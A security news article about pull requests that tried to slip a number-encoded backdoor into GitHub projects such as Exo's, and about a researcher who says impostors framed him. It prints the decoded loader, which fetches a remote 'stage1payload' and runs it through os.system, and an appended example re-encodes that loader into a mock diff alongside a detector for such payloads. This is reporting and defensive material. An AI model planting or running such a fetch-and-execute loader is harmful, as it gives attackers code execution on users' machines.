https://www.bleepingcomputer.com/news/security/github-projects-targeted-with-malicious-commits-to-frame-researcher/
GitHub projects targeted with malicious commits to frame researcher

By Ax Sharma
November 16, 2024, 10:30 AM

GitHub projects have been targeted with malicious commits and pull requests that attempt to inject backdoors into them. Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted, leaving many wondering about the attacker's true intentions.

'Innocent looking PR' caught injecting backdoor

On Tuesday, Alex Cheema, co-founder of EXO Labs, warned of an "innocent looking" code change submitted to EXO's GitHub repository. The pull request, titled "clarify mlx requirement for deepseek models", attempted to modify the models.py Python file in Exo's code base by adding a sequence of numbers to it:

Backdoor attempt on @exolabs through an innocent looking PR. Read every line of code. Stay safu. pic.twitter.com/M0WHoCF5Mu
-- Alex Cheema - e/acc (@alexocheema) November 12, 2024

These numbers are decimal character codes (Unicode code points, all within the ASCII range here), each representing one character. In other words, the plaintext Python code was converted into its numeric equivalent, a trivial obfuscation that hides the payload from anyone skimming the diff and from naive string searches for names like urlopen or os.system, since the numbers have to be mapped back to characters before the code is recognizable. The sequence "105, 109, 112, 111, 114, 116, ..." spells "import", and the full list translates into the following code snippet (URL defanged for safety purposes):

    import os
    import urllib
    import urllib.request

    # Fetch whatever the remote server returns for "stage1payload" ...
    x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
    y = x.read()
    z = y.decode("utf8")
    x.close()
    # ... and run it as a shell command on the machine importing this module.
    os.system(z)

The rather unsophisticated piece of code attempts to connect to evildojo(.)com, download a "stage1" payload, and pass whatever it receives straight to the system shell.
Had the code change been approved and merged into EXO's official repository, which it was not, anyone running the product could have ended up executing whatever the URL served on their system, in effect a functional backdoor. When accessed by BleepingComputer, however, the link returned a 404 (Not Found), and according to several others who tried the URL, no content ever existed at that location.

Who is behind it and why?

This is where it gets tricky, and there is no conclusive answer in sight. The commit appears to have been submitted from a GitHub user, "evildojo666," an account that has since been deleted. The archived page for the GitHub username and the domain evildojo(.)com point to Mike Bell, a Texas-based security researcher, ethical hacker, and software engineer, who has persistently denied having anything to do with these commits. Bell claims someone is impersonating him and making these malicious code submissions to smear him.

[Image: Statement from Mike Bell (X/Twitter)]

Bell has further stated that "there was never any payload...why do people keep assuming there was?"

In all fairness, Bell's story adds up. Anyone can trivially create a GitHub account using another person's details and profile picture and begin submitting code changes and pull requests to projects, all under the guise of that person. The non-existent "stage1payload" page on evildojo's domain is another indicator: since the domain never served any malicious code in the first place, this is likely a smear campaign against the domain's owner, Mike Bell.

Another now-deleted GitHub account, "darkimage666," was identified by Malcore, a malware analysis and reverse engineering platform. This account also impersonated Bell and appeared to take part in the same effort to push backdoor commits to open source projects.

"Not me, an impersonator. Notice account deleted. Very sorry people are being dragged into some skid's beef w/ me," remarked Bell of the impostor account.

Multiple projects targeted

Social media users, including ChrzanKong, noted that other projects had been targeted by different GitHub user accounts with similar commits. According to threat intel analyst vx-underground, "yt-dlp," a popular open source audio and video downloader, was also targeted. Malcore identified at least 18 instances of identical pull requests directed at other projects.

At the time of writing, BleepingComputer observed that many of these malicious commits and the associated "muppet" GitHub user accounts, some of which appear to be Indonesia-based, have been taken down.

Google engineer and tech events lead Bogdan Stanga was able to recreate the pull request to test Presubmit's AI Reviewer, which uses GitHub Actions to perform instant code reviews against pull requests arriving in a repository. The test code change was immediately flagged with a "critical security" alert by the reviewer:

[Image: Presubmit's AI reviewer catches similar malicious PRs (BleepingComputer)]

The incident, although caught and squashed early on, has echoes of the notable xz supply chain attack, which recently demonstrated how malicious code can be snuck into legitimate and widely used open source libraries by nefarious actors.

Open source project maintainers are urged to carefully scrutinize incoming pull requests, via automated tools and thorough human code review, even when they appear to originate from "good faith" contributors.
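As an added example (not code from the article, from Exo, or from Presubmit), the following Python shows both halves of what the article describes: the decimal code point sequence is turned back into readable source, and a simple pre-merge check of the kind a maintainer could run in CI scans a diff for long integer runs that decode to printable text containing dangerous calls. Only the decoded loader text is taken from the article; the surrounding diff lines, the variable name _cfg, the exec() line and the version constant are constructed stand-ins and are not from the actual pull request.

```python
import re

# The defanged loader the article says the PR's number sequence decodes to.
DECODED_LOADER = (
    'import os\n'
    'import urllib\n'
    'import urllib.request\n'
    'x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")\n'
    'y = x.read()\n'
    'z = y.decode("utf8")\n'
    'x.close()\n'
    'os.system(z)\n'
)


def encode_as_codepoints(src: str) -> str:
    """Encode text as comma-separated decimal code points, the form the PR used."""
    return ", ".join(str(ord(c)) for c in src)


def decode_codepoints(seq) -> str:
    """Map integers (or digit strings) back to text: 105,109,112,111,114,116 -> 'import'."""
    return "".join(chr(int(n)) for n in seq)


# Constructed stand-in for the pull request diff (hypothetical variable name _cfg
# and exec() line; only the encoded loader text comes from the article).
SAMPLE_DIFF = (
    "+# clarify mlx requirement for deepseek models\n"
    "+MLX_MIN_VERSION = (0, 18, 0)\n"
    "+_cfg = [" + encode_as_codepoints(DECODED_LOADER) + "]\n"
    "+exec(''.join(chr(c) for c in _cfg))\n"
)

# Runs shorter than this are left alone: short numeric tuples (versions, tensor
# shapes) are normal in ML code, long runs that decode to source are not.
MIN_RUN = 16
INT_RUN = re.compile(r"(?:\b\d{1,7}\b\s*,\s*){%d,}\b\d{1,7}\b" % (MIN_RUN - 1))
SUSPICIOUS = ("os.system", "subprocess", "urlopen", "exec(", "eval(", "base64", "socket")


def find_encoded_payloads(text: str):
    """Return [(decoded_text, matched_tokens)] for each integer run in `text`
    that decodes to printable text containing a suspicious token."""
    findings = []
    for m in INT_RUN.finditer(text):
        nums = [int(n) for n in re.findall(r"\d+", m.group(0))]
        if any(n > 0x10FFFF for n in nums):       # not valid code points
            continue
        decoded = decode_codepoints(nums)
        if not all(c.isprintable() or c in "\n\t\r" for c in decoded):
            continue                               # binary-looking, not source
        hits = [tok for tok in SUSPICIOUS if tok in decoded]
        if hits:
            findings.append((decoded, hits))
    return findings


if __name__ == "__main__":
    for decoded, hits in find_encoded_payloads(SAMPLE_DIFF):
        print("encoded payload found, tokens:", hits)
        print(decoded)
```

The threshold and token list are deliberately crude and should be tuned per project; the point is that the check decodes before it inspects, which is what a plain grep for os.system on the diff text misses. The same decode-then-inspect step is needed for the other common carriers (hex arrays, base64 strings, byte literals), which this block does not cover.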
Tags: Backdoor, GitHub, Open Source, Supply Chain, Supply Chain Attack

Ax Sharma is a security researcher and journalist focused on malware analyses and cybercrime investigations. His expertise includes open source software security, threat intel analysis, and reverse engineering. Frequently featured by leading media outlets like the BBC, Channel 5, Fortune, WIRED, among others, Ax is an active community member of the OWASP Foundation and the British Association of Journalists (BAJ). Send any tips via email or Twitter DM.

Comments

l0de - 3 days ago
"darkmage" is a well-known scammer and wannabe blackhat hacker on efnet. I would not be surprised to find out there is no "impersonator".